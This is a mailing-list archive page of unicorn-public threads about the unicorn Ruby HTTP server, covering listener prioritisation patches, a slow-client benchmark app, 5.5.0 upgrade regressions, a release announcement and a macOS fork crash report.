+      if ready.size == nr_listeners
         tmp = ready.dup
         redo
       end



And `nr' can probably just be a boolean `reopen' flag if we're
not overloading it as a counter.

^ permalink raw reply related	[relevance 0%]

* Sustained queuing on one listener can block requests from other listeners
@ 2020-04-15  5:06  4% Stan Hu
  2020-04-15  5:26  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Stan Hu @ 2020-04-15  5:06 UTC (permalink / raw)
  To: unicorn-public

My unicorn.rb has two listeners:

listen "127.0.0.1:8080", :tcp_nopush => false
listen "/var/run/unicorn.socket", :backlog => 1024

We found that because of the greedy attempt to accept new connections
before calling select() in
https://github.com/defunkt/unicorn/blob/981f561a726bb4307d01e4a09a308edba8d69fe3/lib/unicorn/http_server.rb#L707-L714,
listeners on another socket stall out until the first listener is
drained. We would expect Unicorn to round-robin between the two
listeners, but that doesn't happen as long as there is work to be done
for the first listener. We've verified that deleting that `redo` block
fixes the problem.

What do you think about the various options?

1. Only running that redo block if there is one listener
2. Removing the redo block entirely

^ permalink raw reply	[relevance 4%]

* Re: Traffic priority with Unicorn
  2019-12-17  5:12  0% ` Eric Wong
@ 2019-12-18 22:06  0%   ` Bertrand Paquet
  0 siblings, 0 replies; 200+ results
From: Bertrand Paquet @ 2019-12-18 22:06 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On Tue, 17 Dec 2019 at 06:12, Eric Wong <bofh@yhbt.net> wrote:
>
> Bertrand Paquet <bertrand.paquet@doctolib.com> wrote:
> > Hello,
> >
> > I would like to introduce some traffic priority in Unicorn. The goal
> > is to keep critical endpoints online even if the application is
> > slowing down a lot.
> >
> > The idea is to classify the request at nginx level (by vhost, http
> > path, header or whatever), and send the queries to two different
> > unicorn sockets (opened by the same unicorn instance): one for high
> > priority request, one for low priority request.
> > I need to do some small modifications [1] in the unicorn worker loop
> > to process high priority requests first. It seems to work:
> > - I launch a first apache bench toward the low priority port
> > - I launch a second apache bench toward the high priority port
> > - Unicorn handles the queries only for that one, and stop answering to
> > the low priority traffic
>
> > [1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#
>
> Easier to view locally w/o JS/CSS using "git show -W" for context:
>
> $ git remote add bpaquet https://github.com/bpaquet/unicorn
> $ git fetch bpaquet
> $ git show -W 58d6ba28
>   <snip>
> diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
> index 5334fa0c..976b728e 100644
> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -676,53 +676,56 @@ def reopen_worker_logs(worker_nr)
>    # runs inside each forked worker, this sits around and waits
>    # for connections and doesn't die until the parent dies (or is
>    # given a INT, QUIT, or TERM signal)
>    def worker_loop(worker)
>      ppid = @master_pid
>      readers = init_worker_process(worker)
>      nr = 0 # this becomes negative if we need to reopen logs
>
>      # this only works immediately if the master sent us the signal
>      # (which is the normal case)
>      trap(:USR1) { nr = -65536 }
>
>      ready = readers.dup
> +    high_priority_reader = readers.first
> +    last_processed_is_high_priority = false
>      @after_worker_ready.call(self, worker)
>
>      begin
>        nr < 0 and reopen_worker_logs(worker.nr)
>        nr = 0
>        worker.tick = time_now.to_i
>        tmp = ready.dup
>        while sock = tmp.shift
>          # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
>          # but that will return false
>          if client = sock.kgio_tryaccept
> +          last_processed_is_high_priority = sock == high_priority_reader
>            process_client(client)
>            nr += 1
>            worker.tick = time_now.to_i
>          end
> -        break if nr < 0
> +        break if nr < 0 || last_processed_is_high_priority
>        end
>
>        # make the following bet: if we accepted clients this round,
>        # we're probably reasonably busy, so avoid calling select()
>        # and do a speculative non-blocking accept() on ready listeners
>        # before we sleep again in select().
> -      unless nr == 0
> +      unless nr == 0 || !last_processed_is_high_priority
>          tmp = ready.dup
>          redo
>        end
>
>        ppid == Process.ppid or return
>
>        # timeout used so we can detect parent death:
>        worker.tick = time_now.to_i
>        ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
>      rescue => e
>        redo if nr < 0 && readers[0]
>        Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
>      end while readers[0]
>    end
>
>    # delivers a signal to a worker and fails gracefully if the worker
>    # is no longer running.
>
> > The tradeoff are
> > - No more "bet"[2] on low priority traffic. This is probably slowing
> > down a little bit the low  priority traffic.
>
> Yeah, but low priority is low priority, so it's fine to slow
> them down, right? :>
>
> > - This approach is only low / high. Not sure if I can extend it for 3
> > (or more) level of priority without a non negligible performance
> > impact (because of the "bet" above).
>
> I don't think it makes sense to have more than two levels of
> priority (zero, one, two, infinity rule?)
> <https://en.wikipedia.org/wiki/Zero_One_Infinity>
>
> > Do you think this approach is correct?
>
> readers order isn't guaranteed, especially when inheriting
> sockets from systemd or similar launchers.

Interesting point.

>
> I think some sort order could be defined via listen option...
>
> I'm not sure if inheriting multiple sockets from systemd or
> similar launchers using LISTEN_FDS env can guarantee ordering
> (or IO.select in Ruby, for that matter).
>
> It seems OK otherwise, I think...  Have you tested in real world?

Not yet. But I will probably test it soon.

>
> > Do you have any better idea to have some traffic prioritization?
> > (Another idea is to have dedicated workers for each priority class.
> > This approach has other downsides, I would like to avoid it).
> > Is it something we can  introduce in Unicorn (not as default
> > behaviour, but as a configuration option)?
>
> If you're willing to drop some low-priority requests, using a
> small listen :backlog value for a low-priority listen may work.
>
> I'm hesitant to put extra code in worker_loop method since
> it can slow down current users who don't need the feature.
>
> Instead, perhaps try replacing the worker_loop method entirely
> (similar to how oob_gc.rb wraps process_client) so users who
> don't enable the feature won't be penalized with extra code.
> Users who opt into the feature can get an entirely different
> method.

Ok I will try this approach. I'm a little bit annoyed by the code duplication.

>
> > Thx for any opinion.
>
> The best option would be to never get yourself in a situation
> where you're never overloaded by making everything fast :>
> Anything else seems pretty ugly...

On a system which handle 10k QPS, it's really difficult to never have
an issue somewhere :)

Thx

Bertrand

^ permalink raw reply	[relevance 0%]

* Re: Traffic priority with Unicorn
  2019-12-16 22:34  4% Traffic priority with Unicorn Bertrand Paquet
@ 2019-12-17  5:12  0% ` Eric Wong
  2019-12-18 22:06  0%   ` Bertrand Paquet
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2019-12-17  5:12 UTC (permalink / raw)
  To: Bertrand Paquet; +Cc: unicorn-public

Bertrand Paquet <bertrand.paquet@doctolib.com> wrote:
> Hello,
> 
> I would like to introduce some traffic priority in Unicorn. The goal
> is to keep critical endpoints online even if the application is
> slowing down a lot.
> 
> The idea is to classify the request at nginx level (by vhost, http
> path, header or whatever), and send the queries to two different
> unicorn sockets (opened by the same unicorn instance): one for high
> priority request, one for low priority request.
> I need to do some small modifications [1] in the unicorn worker loop
> to process high priority requests first. It seems to work:
> - I launch a first apache bench toward the low priority port
> - I launch a second apache bench toward the high priority port
> - Unicorn handles the queries only for that one, and stop answering to
> the low priority traffic

> [1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#

Easier to view locally w/o JS/CSS using "git show -W" for context:

$ git remote add bpaquet https://github.com/bpaquet/unicorn
$ git fetch bpaquet
$ git show -W 58d6ba28
  <snip>
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 5334fa0c..976b728e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -676,53 +676,56 @@ def reopen_worker_logs(worker_nr)
   # runs inside each forked worker, this sits around and waits
   # for connections and doesn't die until the parent dies (or is
   # given a INT, QUIT, or TERM signal)
   def worker_loop(worker)
     ppid = @master_pid
     readers = init_worker_process(worker)
     nr = 0 # this becomes negative if we need to reopen logs
 
     # this only works immediately if the master sent us the signal
     # (which is the normal case)
     trap(:USR1) { nr = -65536 }
 
     ready = readers.dup
+    high_priority_reader = readers.first
+    last_processed_is_high_priority = false
     @after_worker_ready.call(self, worker)
 
     begin
       nr < 0 and reopen_worker_logs(worker.nr)
       nr = 0
       worker.tick = time_now.to_i
       tmp = ready.dup
       while sock = tmp.shift
         # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
         # but that will return false
         if client = sock.kgio_tryaccept
+          last_processed_is_high_priority = sock == high_priority_reader
           process_client(client)
           nr += 1
           worker.tick = time_now.to_i
         end
-        break if nr < 0
+        break if nr < 0 || last_processed_is_high_priority
       end
 
       # make the following bet: if we accepted clients this round,
       # we're probably reasonably busy, so avoid calling select()
       # and do a speculative non-blocking accept() on ready listeners
       # before we sleep again in select().
-      unless nr == 0
+      unless nr == 0 || !last_processed_is_high_priority
         tmp = ready.dup
         redo
       end
 
       ppid == Process.ppid or return
 
       # timeout used so we can detect parent death:
       worker.tick = time_now.to_i
       ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
     rescue => e
       redo if nr < 0 && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
     end while readers[0]
   end
 
   # delivers a signal to a worker and fails gracefully if the worker
   # is no longer running.

> The tradeoff are
> - No more "bet"[2] on low priority traffic. This is probably slowing
> down a little bit the low  priority traffic.

Yeah, but low priority is low priority, so it's fine to slow
them down, right? :>

> - This approach is only low / high. Not sure if I can extend it for 3
> (or more) level of priority without a non negligible performance
> impact (because of the "bet" above).

I don't think it makes sense to have more than two levels of
priority (zero, one, two, infinity rule?)
<https://en.wikipedia.org/wiki/Zero_One_Infinity>

> Do you think this approach is correct?

readers order isn't guaranteed, especially when inheriting
sockets from systemd or similar launchers.

I think some sort order could be defined via listen option...

I'm not sure if inheriting multiple sockets from systemd or
similar launchers using LISTEN_FDS env can guarantee ordering
(or IO.select in Ruby, for that matter).

It seems OK otherwise, I think...  Have you tested in real world?

> Do you have any better idea to have some traffic prioritization?
> (Another idea is to have dedicated workers for each priority class.
> This approach has other downsides, I would like to avoid it).
> Is it something we can  introduce in Unicorn (not as default
> behaviour, but as a configuration option)?

If you're willing to drop some low-priority requests, using a
small listen :backlog value for a low-priority listen may work.

I'm hesitant to put extra code in worker_loop method since
it can slow down current users who don't need the feature.

Instead, perhaps try replacing the worker_loop method entirely
(similar to how oob_gc.rb wraps process_client) so users who
don't enable the feature won't be penalized with extra code.
Users who opt into the feature can get an entirely different
method.

> Thx for any opinion.

The best option would be to never get yourself in a situation
where you're never overloaded by making everything fast :>
Anything else seems pretty ugly...

^ permalink raw reply related	[relevance 0%]

* Traffic priority with Unicorn
@ 2019-12-16 22:34  4% Bertrand Paquet
  2019-12-17  5:12  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Bertrand Paquet @ 2019-12-16 22:34 UTC (permalink / raw)
  To: unicorn-public

Hello,

I would like to introduce some traffic priority in Unicorn. The goal
is to keep critical endpoints online even if the application is
slowing down a lot.

The idea is to classify the request at nginx level (by vhost, http
path, header or whatever), and send the queries to two different
unicorn sockets (opened by the same unicorn instance): one for high
priority request, one for low priority request.
I need to do some small modifications [1] in the unicorn worker loop
to process high priority requests first. It seems to work:
- I launch a first apache bench toward the low priority port
- I launch a second apache bench toward the high priority port
- Unicorn handles the queries only for that one, and stop answering to
the low priority traffic

The tradeoff are
- No more "bet"[2] on low priority traffic. This is probably slowing
down a little bit the low  priority traffic.
- This approach is only low / high. Not sure if I can extend it for 3
(or more) level of priority without a non negligible performance
impact (because of the "bet" above).

Do you think this approach is correct?
Do you have any better idea to have some traffic prioritization?
(Another idea is to have dedicated workers for each priority class.
This approach has other downsides, I would like to avoid it).
Is it something we can  introduce in Unicorn (not as default
behaviour, but as a configuration option)?

Thx for any opinion.

Bertrand

[1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#
[2] https://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb#n707

^ permalink raw reply	[relevance 4%]

* yet-another-horribly-named-server as an nginx alternative
@ 2019-05-26  5:24 10% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2019-05-26  5:24 UTC (permalink / raw)
  To: unicorn-public

First off, it should come as no surprise to anybody nowadays
that I hate marketing :P  I also hate that anybody using unicorn
is also stuck with nginx as the only (well-known) proxy which
fully buffers both requests AND responses.

One of the major reasons I like *nix-like is interchangeable
parts, and the lack of proxies which can do what nginx does
always bothered me.  nginx has also continuously gotten more
enterprisey over the years, maybe a decidedly non-enterprisey
alternative is in order :>

Keep in mind: I am nothing more than an Internet loon with
no way to substantiate any claims I make!

Hypothetically, I've been using this server in production since
2013, and doing HTTPS termination since 2016.  It's handled
numerous hug-of-death events over the years sitting in front of
Varnish, unicorn, mod_perl stuff, PSGI stuff and also serving
static files on a cheap VPS.

Even if by some coincidence/luck unicorn somehow works well for
you, this alternative is the complete opposite in terms of
design.  I have no real production experience with epoll,
kqueue, threads or non-blocking I/O; all of which are (ab)used
by this alternative.

The yin to unicorn's yang, if you will.

Again, keep in mind that I'm an Internet loon.  I feel bad for
you if some "cool Internet companies" misled you into believing
unicorn is competently engineered.  This alternative is likely
worse given the effects of pollution and head trauma I've
suffered over the years.

I'm not going to mention this "nginx alternative" by name, here;
but it's been announced on the ruby-talk mailing list at least
(and it's mostly Ruby with some C, not that I know C).

So if anybody wants to update the unicorn docs to give this
alternative proxy equal mention with nginx, they're welcome to
send such as patch.  Please no superlatives, hype, or "marketing
speak", though.

I can't make such an update to unicorn docs myself, since I
would be abusing my position as the maintainer of this project
to market yet-another-horribly-named-server.

Thanks for understanding.


One notable difference from nginx ("nqinagntr bire atvak" vs V
jrer tbbq ng znexrgvat :P):

  Output buffering is lazy, similar to how Unicorn::TeeInput works
  (but for output, not input).  It matters for large responses,
  whereas nginx "proxy_buffering" is an on/off switch, this alternative
  only buffers response bodies when the slow client can't keep up
  with a backend (unicorn).

^ permalink raw reply	[relevance 10%]

* [PATCH 1/3] test/benchmark/ddstream: demo for slowly reading clients
  @ 2019-05-12 22:25  7% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2019-05-12 22:25 UTC (permalink / raw)
  To: unicorn-public

This is intended to demonstrate how badly we suck at dealing
with slow clients.  It can help users evaluate alternative
fully-buffering reverse proxies, because nginx should not
be the only option.

Update the benchmark README while we're at it
---
 test/benchmark/README      | 13 +++++++---
 test/benchmark/ddstream.ru | 50 ++++++++++++++++++++++++++++++++++++++
 2 files changed, 59 insertions(+), 4 deletions(-)
 create mode 100644 test/benchmark/ddstream.ru

diff --git a/test/benchmark/README b/test/benchmark/README
index 1d3cdd0..e9b7a41 100644
--- a/test/benchmark/README
+++ b/test/benchmark/README
@@ -42,9 +42,14 @@ The benchmark client is usually httperf.
 Another gentle reminder: performance with slow networks/clients
 is NOT our problem.  That is the job of nginx (or similar).
 
+== ddstream.ru
+
+Standalone Rack app intended to show how BAD we are at slow clients.
+See usage in comments.
+
 == Contributors
 
-This directory is maintained independently in the "benchmark" branch
-based against v0.1.0.  Only changes to this directory (test/benchmarks)
-are committed to this branch although the master branch may merge this
-branch occassionaly.
+This directory is intended to remain stable.  Do not make changes
+to benchmarking code which can change performance and invalidate
+results across revisions.  Instead, write new benchmarks and update
+coments/documentation as necessary.
diff --git a/test/benchmark/ddstream.ru b/test/benchmark/ddstream.ru
new file mode 100644
index 0000000..b14c973
--- /dev/null
+++ b/test/benchmark/ddstream.ru
@@ -0,0 +1,50 @@
+# This app is intended to test large HTTP responses with or without
+# a fully-buffering reverse proxy such as nginx. Without a fully-buffering
+# reverse proxy, unicorn will be unresponsive when client count exceeds
+# worker_processes.
+#
+# To demonstrate how bad unicorn is at slowly reading clients:
+#
+#   # in one terminal, start unicorn with one worker:
+#   unicorn -E none -l 127.0.0.1:8080 test/benchmark/ddstream.ru
+#
+#   # in a different terminal, start more slow curl processes than
+#   # unicorn workers and watch time outputs
+#   curl --limit-rate 8K --trace-time -vsN http://127.0.0.1:8080/ >/dev/null &
+#   curl --limit-rate 8K --trace-time -vsN http://127.0.0.1:8080/ >/dev/null &
+#   wait
+#
+# The last client won't see a response until the first one is done reading
+#
+# nginx note: do not change the default "proxy_buffering" behavior.
+# Setting "proxy_buffering off" prevents nginx from protecting unicorn.
+
+# totally standalone rack app to stream a giant response
+class BigResponse
+  def initialize(bs, count)
+    @buf = "#{bs.to_s(16)}\r\n#{' ' * bs}\r\n"
+    @count = count
+    @res = [ 200,
+      { 'Transfer-Encoding' => -'chunked', 'Content-Type' => 'text/plain' },
+      self
+    ]
+  end
+
+  # rack response body iterator
+  def each
+    (1..@count).each { yield @buf }
+    yield -"0\r\n\r\n"
+  end
+
+  # rack app entry endpoint
+  def call(_env)
+    @res
+  end
+end
+
+# default to a giant (128M) response because kernel socket buffers
+# can be ridiculously large on some systems
+bs = ENV['bs'] ? ENV['bs'].to_i : 65536
+count = ENV['count'] ? ENV['count'].to_i : 2048
+warn "serving response with bs=#{bs} count=#{count} (#{bs*count} bytes)"
+run BigResponse.new(bs, count)
-- 
EW


^ permalink raw reply related	[relevance 7%]

* Re: Issues after 5.5.0 upgrade
  2019-03-06  4:44  0%     ` Eric Wong
@ 2019-03-06  5:57  0%       ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2019-03-06  5:57 UTC (permalink / raw)
  To: Eric Wong; +Cc: Stan Pitucha, unicorn-public

On 03/06 04:44, Eric Wong wrote:
> Stan Pitucha <stan.pitucha@envato.com> wrote:
> > > I only saw one issue (proposed fix below).
> > Sorry, I solved the other one while writing the email but forgot to
> > update the intro.
> >
> > So the fix worked for the issue I mentioned, thanks! Also, running
> > unicorn directly works just fine now.
> 
> You're welcome and thanks for following up!
> 
> > I ran into another regression with unicorn_rails though. We're doing
> > some work in `after_fork` which relies on a class found in
> > `lib/logger_switcher.rb`. Unfortunately it looks like the scope
> > changed and now I get workers respawning in a loop:
> > 
> > E, [2019-03-06T15:03:04.990789 #46680] ERROR -- : uninitialized
> > constant #<Class:#<Unicorn::Configurator:0x00007fc3d113d098>>::LoggerSwitcher
> > (NameError)
> 
> Is this with `preload_app true`?  I'm not too up-to-date
> with scoping and namespace behavior stuff, actually.

This is just a guess, but we probably want to call the Unicorn.builder
lambda with the same arguments as the rails_builder lambda.

diff --git a/bin/unicorn_rails b/bin/unicorn_rails
index ea4f822..354c1df 100755
--- a/bin/unicorn_rails
+++ b/bin/unicorn_rails
@@ -132,11 +132,11 @@ def rails_builder(ru, op, daemonize)
 
   # this lambda won't run until after forking if preload_app is false
   # this runs after config file reloading
-  lambda do ||
+  lambda do |x, server|
     # Rails 3 includes a config.ru, use it if we find it after
     # working_directory is bound.
     ::File.exist?('config.ru') and
-      return Unicorn.builder('config.ru', op).call
+      return Unicorn.builder('config.ru', op).call(x, server)
 
     # Load Rails and (possibly) the private version of Rack it bundles.
     begin

If that doesn't fix it, keep reading.

If after_fork is referencing LoggerSwitcher, and preload_app is not set,
then I think the failure should be expected, as in that case after_fork
is called before build_app!.  That would not explain a regression,
though, as that behavior should have been true in 5.4.1.

Does the problem go away if you switch after_fork to after_worker_ready?
Is preload_app set to true?

Thanks,
Jeremy

^ permalink raw reply related	[relevance 0%]

* Re: Issues after 5.5.0 upgrade
  2019-03-06  4:07  4%   ` Stan Pitucha
@ 2019-03-06  4:44  0%     ` Eric Wong
  2019-03-06  5:57  0%       ` Jeremy Evans
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2019-03-06  4:44 UTC (permalink / raw)
  To: Stan Pitucha, Jeremy Evans; +Cc: unicorn-public

Stan Pitucha <stan.pitucha@envato.com> wrote:
> > I only saw one issue (proposed fix below).
> Sorry, I solved the other one while writing the email but forgot to
> update the intro.
>
> So the fix worked for the issue I mentioned, thanks! Also, running
> unicorn directly works just fine now.

You're welcome and thanks for following up!

> I ran into another regression with unicorn_rails though. We're doing
> some work in `after_fork` which relies on a class found in
> `lib/logger_switcher.rb`. Unfortunately it looks like the scope
> changed and now I get workers respawning in a loop:
> 
> E, [2019-03-06T15:03:04.990789 #46680] ERROR -- : uninitialized
> constant #<Class:#<Unicorn::Configurator:0x00007fc3d113d098>>::LoggerSwitcher
> (NameError)

Is this with `preload_app true`?  I'm not too up-to-date
with scoping and namespace behavior stuff, actually.

I'm too tired at the moment, maybe Jeremy can help figure this out.

> config/unicorn.rb:97:in `block in reload'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:653:in
> `init_worker_process'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:681:in
> `worker_loop'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:548:in
> `spawn_missing_workers'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:562:in
> `maintain_worker_count'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:295:in
> `join'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/bin/unicorn_rails:209:in
> `<top (required)>'
> bin/unicorn_rails:17:in `load'
> bin/unicorn_rails:17:in `<main>'
> E, [2019-03-06T15:03:04.992143 #46194] ERROR -- : reaped
> #<Process::Status: pid 46680 exit 1> worker=1
> 
> The LoggerSwitcher was previously resolved by rails automatically.

^ permalink raw reply	[relevance 0%]

* Re: Issues after 5.5.0 upgrade
  @ 2019-03-06  4:07  4%   ` Stan Pitucha
  2019-03-06  4:44  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Stan Pitucha @ 2019-03-06  4:07 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, Jeremy Evans

> I only saw one issue (proposed fix below).
Sorry, I solved the other one while writing the email but forgot to
update the intro.

So the fix worked for the issue I mentioned, thanks! Also, running
unicorn directly works just fine now.

I ran into another regression with unicorn_rails though. We're doing
some work in `after_fork` which relies on a class found in
`lib/logger_switcher.rb`. Unfortunately it looks like the scope
changed and now I get workers respawning in a loop:

E, [2019-03-06T15:03:04.990789 #46680] ERROR -- : uninitialized
constant #<Class:#<Unicorn::Configurator:0x00007fc3d113d098>>::LoggerSwitcher
(NameError)
config/unicorn.rb:97:in `block in reload'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:653:in
`init_worker_process'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:681:in
`worker_loop'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:548:in
`spawn_missing_workers'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:562:in
`maintain_worker_count'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:295:in
`join'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/bin/unicorn_rails:209:in
`<top (required)>'
bin/unicorn_rails:17:in `load'
bin/unicorn_rails:17:in `<main>'
E, [2019-03-06T15:03:04.992143 #46194] ERROR -- : reaped
#<Process::Status: pid 46680 exit 1> worker=1

The LoggerSwitcher was previously resolved by rails automatically.

^ permalink raw reply	[relevance 4%]

* Issues after 5.5.0 upgrade
@ 2019-03-06  1:47  5% Stan Pitucha
    0 siblings, 1 reply; 200+ results
From: Stan Pitucha @ 2019-03-06  1:47 UTC (permalink / raw)
  To: unicorn-public

Hi, I'm running into two issues after an upgrade from 5.4.1 (a few
previous versions worked just fine as well). I've got a rails 5.2 app
started via:

bin/unicorn_rails -E development -c config/unicorn.rb

With the minimal config.ru in place (require environment, run app), I get:

I, [2019-03-06T12:28:44.393406 #43714]  INFO -- : Refreshing Gem list
ArgumentError: wrong number of arguments (given 0, expected 2)
  /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn.rb:49:in
`block in builder'
  /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/bin/unicorn_rails:139:in
`block in rails_builder'
  /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:794:in
`build_app!'
  /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:141:in
`start'
  /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/bin/unicorn_rails:209:in
`<top (required)>'
  bin/unicorn_rails:17:in `load'
  bin/unicorn_rails:17:in `<top (required)>'

Any ideas how to debug this further? (I made an attempt at bisecting
last release, but ended up with yet another issue there when building
native extensions when installing 5.4.1 over another version of 5.4.1,
so gave up for now - let me know if that's the only way)

-- 

Stan Pitucha

Site Reliability Engineer at Envato
http://envato.com

^ permalink raw reply	[relevance 5%]

* Re: Log URL with murder_lazy_workers
       [not found]         ` <CADGZSScpXo7-PvM=Ki64hhPSzWAsjyT+fWKAZ9-30U69x+54iA@mail.gmail.com>
@ 2018-01-15  3:22  4%       ` Sam Saffron
  0 siblings, 0 replies; 200+ results
From: Sam Saffron @ 2018-01-15  3:22 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: Eric Wong, unicorn-public

Hi Jeremy,

Yes we already have statement timeout set, it just does not trigger
under extreme load cause its usually a piling of papercuts and not one
big nasty query, 26 seconds in you issue yet another query and...
boom. I guess we could prepend a custom exec that times out early and
re-sets it per statement.

Thanks for the suggestion of the info file, I will consider adding
something like it.

Sam

On Mon, Jan 15, 2018 at 1:40 PM, Jeremy Evans <jeremyevans0@gmail.com> wrote:
> On Sun, Jan 14, 2018 at 6:18 PM, Sam Saffron <sam.saffron@gmail.com> wrote:
>>
>> It is super likely this could be handled in the app if we had:
>>
>> db_connection.timeout_at Time.now + 29
>>
>> Then the connection could trigger the timeout and kill off the request
>> without needing to tear down the entire process and re-forking.
>>
>> Making this happen is a bit tricky cause it would require some hacking
>> on the pg gem.
>
>
> Sam,
>
> For this particular case, you can SET statement_timeout (29000) on the
> PostgreSQL connection, but note that is a per statement timeout, not a per
> web request timeout.
>
> What I end up doing for important production apps is have the worker log
> request information for each request to an open file descriptor
> (seek(0)/write/truncate), and having the master process use the contents of
> the worker-specific file to report errors in case of worker crashes.
>
> Thanks,
> Jeremy
>

^ permalink raw reply	[relevance 4%]

* [ANN] unicorn 5.4.0 - Rack HTTP server for fast clients and Unix
@ 2017-12-23 23:42  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-12-23 23:42 UTC (permalink / raw)
  To: ruby-talk, unicorn-public; +Cc: James P Robinson Jr, Sam Saffron

unicorn is an HTTP server for Rack applications designed to only serve
fast clients on low-latency, high-bandwidth connections and take
advantage of features in Unix/Unix-like kernels.  Slow clients should
only be served by placing a reverse proxy capable of fully buffering
both the the request and response in between unicorn and slow clients.

* https://bogomips.org/unicorn/
* public list: unicorn-public@bogomips.org
* mail archives: https://bogomips.org/unicorn-public/
* git clone git://bogomips.org/unicorn.git
* https://bogomips.org/unicorn/NEWS.atom.xml
* nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn

Changes:

Rack hijack support improves as the app code can capture and use
the Rack `env' privately without copying it (to avoid clobbering
by another client).  Thanks to Sam Saffron for reporting and
testing this new feature:
  https://bogomips.org/unicorn-public/CAAtdryPG3nLuyo0jxfYW1YHu1Q+ZpkLkd4KdWC8vA46B5haZxw@mail.gmail.com/T/

We also now support $DEBUG being set by the Rack app (instead of
relying on the "-d" CLI switch).  Thanks to James P Robinson Jr
for reporting this bug:
  https://bogomips.org/unicorn-public/D6324CB4.7BC3E%25james.robinson3@cigna.com/T/
  (Coincidentally, this fix will be irrelevant for Ruby 2.5
   which requires 'pp' by default)

There's a few minor test cleanups and documentation updates, too.

All commits since v5.3.1 (2017-10-03):

    reduce method calls with String#start_with?
    require 'pp' if $DEBUG is set by Rack app
    avoid reusing env on hijack
    tests: cleanup some unused variable warnings
    ISSUES: add a note about Debian BTS interopability

Roughly all mailing discussions since the last release:

  https://bogomips.org/unicorn-public/?q=d:20171004..20171223

^ permalink raw reply	[relevance 4%]

* Re: Bug, probably related to Unicoen
  @ 2017-09-27  7:05  5%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-09-27  7:05 UTC (permalink / raw)
  To: Felix Yasnopolski; +Cc: unicorn-public

Felix: Ping?  Did you ever get a chance to try the things I
suggested in my previous message or figure this out another way?

ref: https://bogomips.org/unicorn-public/20170914091548.GA13634@dcvr/

Thanks.

^ permalink raw reply	[relevance 5%]

* initialize/fork crash in macOS 10.13
@ 2017-08-04 16:40  4% Jeffrey Carl Faden
  0 siblings, 0 replies; 200+ results
From: Jeffrey Carl Faden @ 2017-08-04 16:40 UTC (permalink / raw)
  To: unicorn-public

According to this post...
http://www.sealiesoftware.com/blog/archive/2017/6/5/Objective-C_and_fork_in_macOS_1013.html

The rules around initialize and fork() have changed in macOS 10.13, which is coming out in a month or so. I tried using Unicorn today to run a unicorn_rails instance, and got this as part of my traceback:

objc[95737]: +[__NSPlaceholderDictionary initialize] may have been in progress in another thread when fork() was called. We cannot safely call it or ignore it in the fork() child process. Crashing instead. Set a breakpoint on objc_initializeAfterForkError to debug.
